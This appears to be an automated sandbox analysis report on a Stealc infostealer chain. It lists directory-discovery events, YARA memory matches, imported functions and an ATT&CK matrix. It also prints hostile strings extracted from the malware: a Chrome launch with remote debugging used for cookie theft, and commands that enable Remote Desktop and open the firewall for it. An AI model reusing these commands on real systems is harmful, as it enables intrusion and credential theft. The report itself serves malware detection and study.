                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOH
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZG
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCAN
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOH
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMG
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMG
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\ERWQDBYZVW
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\ERWQDBYZVW
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUST
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZG
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCAN
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHV
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUF
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\WHZAGPPPLA
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\WHZAGPPPLA
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOH
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMG
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\ERWQDBYZVW
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCAN
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOH
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMG
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\DUKNXICOZT
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\ERWQDBYZVW
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUST
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZG
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCAN
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOH
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\DUKNXICOZT
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUST
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZG
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCAN
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOH
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOH
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\DUKNXICOZT
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\DUKNXICOZT
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUF
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\WHZAGPPPLA
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOH
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\ERWQDBYZVW
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\ERWQDBYZVW
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZG
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZG
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHV
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOH
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUF
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOH
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOH
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMG
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMG
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\ERWQDBYZVW
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\ERWQDBYZVW
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZG
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOH
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOH
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\DUKNXICOZT
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOH
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOH
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMG
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMG
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUST
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUST
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZG
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUF
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\WHZAGPPPLA
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQC
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOH
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOH
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMG
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\ERWQDBYZVW
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUST
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUST
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\WHZAGPPPLA
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOH
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\DUKNXICOZT
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\DUKNXICOZT
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\ERWQDBYZVW
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\ERWQDBYZVW
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZG
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCAN
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCAN
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHV
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHV
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUF
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\WHZAGPPPLA
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQC
                          Source: Yara matchFile source: 00000016.00000003.2179626539.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002A.00000003.2809427690.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000016.00000003.2257510373.0000000000BD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000016.00000003.2256959453.0000000000BD2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002A.00000003.2592238207.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000016.00000003.2176713314.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000002.2162755046.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000016.00000003.2342182926.0000000000BD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000016.00000003.2177592016.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002A.00000003.2853152911.0000000000F59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000016.00000003.2207797471.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002A.00000003.2461039118.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000016.00000003.2227458323.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002A.00000003.2821521459.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002A.00000003.2592546512.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000016.00000003.2256925605.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000016.00000003.2208207626.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000016.00000003.2206163710.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000016.00000003.2178551936.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002A.00000003.2345680824.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002A.00000003.2345845833.0000000000F55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002A.00000003.2708208621.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002A.00000003.2783203653.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000016.00000003.2227968295.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002A.00000003.2743575261.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002A.00000003.2461647337.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000016.00000003.2234480460.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002A.00000003.2637900652.0000000000F55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002A.00000003.2592686398.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002A.00000003.2512885460.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: stealc_default2.exe PID: 4092, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: new_v8.exe PID: 2864, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 550b7cfe5f.exe PID: 5732, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                          Source: Yara matchFile source: 00000012.00000003.2190552389.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000012.00000003.2193872573.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Offnewhere.exe PID: 7260, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: new_v8.exe PID: 2864, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 550b7cfe5f.exe PID: 5732, type: MEMORYSTR
                          Source: Yara matchFile source: 17.0.stealc_default2.exe.770000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.2.stealc_default2.exe.770000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000011.00000002.2162755046.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000000.1886878201.000000000078E000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000000.1886855224.0000000000771000.00000080.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: stealc_default2.exe PID: 4092, type: MEMORYSTR
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe, type: DROPPED
                          Source: Yara matchFile source: Process Memory Space: stealc_default2.exe PID: 4092, type: MEMORYSTR
                          Source: f55899dae2.exe, 00000021.00000002.2615212451.0000000002951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: net start termservice
                          Source: f55899dae2.exe, 00000021.00000002.2615212451.0000000002951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set9808a67f01d2f0720518035acbde7521c1ec479e5342a25940592acf24703eb27c43933a6df6cc301ccfdb96c295ca9e1379cdKQ6YLeECCI7oRIIlBdu0JXCschRUJvTmfL1bOR7r2ybwLPTtMr==SvPibCQyHPQpdL==JPKpdL==XgagNuVoBJ1TRp==WZYvZSx5AcYV4F==SXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcWoYyPWW XN==SXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcTYkA8A0oXUy VSJq29EKfvRj1wrD1Urk1YMDS0GeciN62q==SjKqWZQhIx5IxvMEWthJxwZwAVygSXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcWoYyakKrZBtxBpL8SEysZYFm1NP=SXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcTYkA8A0oXUy UXdq1wz8Wb5jOALv2o==HSKQRQFVJabxXJtwyK==VButcv==SBYQVv==PXKR9TF3bkB3aZF3 0B3Wj 3WUx3aDB3bTT3XDP3WUN3 EN3 Z23agP=W0yiZx1p1wAZ3Rtg2wVh1yr8W0yiZx1p1wz=WZmmcx1p1wz=XAt=XQt=XQx=XQB=RTumbb==9EGXcykAAm==9EGXcCIaAoa=XU7iXDmpWZQhaEBu UCmcjatJ0uYaRR5NDB+NDF+JYqpdR u1dPmIvhoGt==dx==HkKraSMdNN==aZ7ibBsEB98bgvs=9ZKvbhRxBpLl4vtjPZKXThB50N2cZShq3ALqHOZmdx==SEysZYFm1KU9ivB4OSOyUWMlJSbdiw 92gK=OUOmchA=QZuwcBRD2SwWNtt9Na==PSCCVv==SDurZBAlJSYaiMFg3Ba=PDYgdB5Dxvgc36==OSOEKwNtVB55NMAK4LJS2gbX4I==OjaXZBRrOM8b4ME=RjYvdB5zSZYtaB5EOZYqbXNATZarRBRrOM8b4ME=KAtvMuM6C fVTF==ajx=bZx=OZYrdBRz3s4LjMxcDcrq3Or0cYEl9hHlXjYvbNXpNNU9Tnx 1XLrOyzygU3xHMRjJPPqLNWyBNeAbX15OM8RQJNg2Xrs2Uf0cXbyKcsc 0yqLRNm3wHYNv191QK6xeLhfHHmKssc9TmibhByOJ3 GdPHQX5z3wYlirXL4RriDavheIEw7QE8bDasbd5ANTUcirXq3BziNOUNEh3OBNdqLNWyAI3=JPPKCb==N0CgceWCJjetZr==OZYrdBRz3s4LjMxcDcre2zvscXQl Acl fY1LS 83o4dgSFkARLv1yPu03boVQH=SYaQVzRSMuQShcFc1hHA1UZ0enbwQWMQVBCsbiND1SA4VR5k2BLXOPDO0X4pTyEl UqYdBRDIcIk4F==OZYqcCR5ONMF3LXcWTygZBRrOSkgfbpj1QVs2zzye4U5 h5UcUdtMOEECtXTSocWAPY=JUKraRJAOwXkSYaQVzRSMuQShcFc1hHA1UZ0enbwQWMQVBCsbiND1SA40L1g3ALhKefk1XbgMU0ETCyMTAt1HKUwYQs=SYaQVzRSMuQmgcNp1WnQOPKwOEIgQWMobjagZSJhFcIqfLJv0RDt1yz5ZG2tVAMlTjahZR5OGq==VAptMyw=PDKjYSRx3vQciwNg1g4wAdbS1YQz8BMQ9TYrPDKjYSRx3vQciwNg1g4wAdfS1YQz8BMQ9TYrSXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0BdTgNhFTYphbRl3zPi2fHpd37=SEysZCRo3u89gLQ=KgpuOL==KgpvMb==KgpuNb==KgpvNL==O0KvchRz3uMSfLtbVx==Mgd3akKrZBtxBpLl4MdcJZhdGkGecXpw0MAjNr5dxwZm1KuiGfpjJdx50M4cgSRRxxudyaSg1HYwEu==HfNdRSdu3sL=GfpjJdxDOM78GzNjIv==SDY0ZSFE0wYjgr1c4AK=JTK1ZRJ63womgcxm1Abg4Kvy1X4z AMp9T3rZRMlAK2ggvQ8xa==Gd==aZ7YdBNA3S78QMI8ARGdBs==a0F6cr==ajurZB5yQZK2Yh5m2cT8YvBW1XLXMxvy1XAzUQH=KAptMyw5BJn=KAptMyw5B L=KAptMyw5B P=KAptMyw5BS1=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C960C40 sqlite3_bind_zeroblob,17_2_6C960C40
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C960D60 sqlite3_bind_parameter_name,17_2_6C960D60
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C888EA0 sqlite3_clear_bindings,17_2_6C888EA0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C960B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,17_2_6C960B40
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C886410 bind,WSAGetLastError,17_2_6C886410
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8860B0 listen,WSAGetLastError,17_2_6C8860B0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C88C030 sqlite3_bind_parameter_count,17_2_6C88C030
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C88C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,17_2_6C88C050
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C886070 PR_Listen,17_2_6C886070
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8122D0 sqlite3_bind_blob,17_2_6C8122D0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8863C0 PR_Bind,17_2_6C8863C0
                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information111
                          Scripting
                          Valid Accounts21
                          Windows Management Instrumentation
                          111
                          Scripting
                          1
                          DLL Side-Loading
                          111
                          Disable or Modify Tools
                          2
                          OS Credential Dumping
                          2
                          System Time Discovery
                          1
                          Remote Desktop Protocol
                          12
                          Archive Collected Data
                          1
                          Ingress Tool Transfer
                          Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts11
                          Native API
                          1
                          DLL Side-Loading
                          1
                          Windows Service
                          111
                          Deobfuscate/Decode Files or Information
                          LSASS Memory1
                          Account Discovery
                          Remote Desktop Protocol41
                          Data from Local System
                          2
                          Encrypted Channel
                          Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts12
                          Command and Scripting Interpreter
                          1
                          Windows Service
                          412
                          Process Injection
                          4
                          Obfuscated Files or Information
                          Security Account Manager13
                          File and Directory Discovery
                          SMB/Windows Admin Shares1
                          Email Collection
                          1
                          Remote Access Software
                          Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal Accounts11
                          Scheduled Task/Job
                          11
                          Scheduled Task/Job
                          11
                          Scheduled Task/Job
                          23
                          Software Packing
                          NTDS469
                          System Information Discovery
                          Distributed Component Object ModelInput Capture1
                          Application Layer Protocol
                          Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud Accounts1
                          PowerShell
                          121
                          Registry Run Keys / Startup Folder
                          121
